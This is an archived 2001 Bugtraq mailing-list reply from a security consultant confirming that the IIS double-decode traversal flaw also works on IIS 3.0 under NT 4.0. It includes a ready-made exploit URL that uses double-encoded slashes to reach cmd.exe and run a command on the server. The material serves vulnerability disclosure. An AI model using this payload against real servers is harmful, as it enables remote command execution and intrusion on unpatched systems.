Yes! I can confirm this . It worked on our testbed. NT 4.0 + IIS 3.0 + SP6a http://www.example.com/scripts/..%252f..%252f..%252f..%252fwinnt/system32/cm d.exe?/c+dir+c:\ Regards, Aldo Albuquerque - CCSA Tempest Security Technologies - http://www.tempest.com.br CESAR - Centro de Estudos e Sistemas Avançados do Recife - http://www.cesar.org.br ================================================================ ----- Original Message ----- From: Michael Vassiliadis To: bugtraqat_private Sent: Thursday, May 17, 2001 12:52 AM Subject: IIS Decode There has been so much talk about this new "diamond" from m$, but NOONE discovered that this also works on IIS 3!!!..... Please confirm...
This archive was generated by hypermail 2b30 : Thu May 17 2001 - 18:09:39 PDT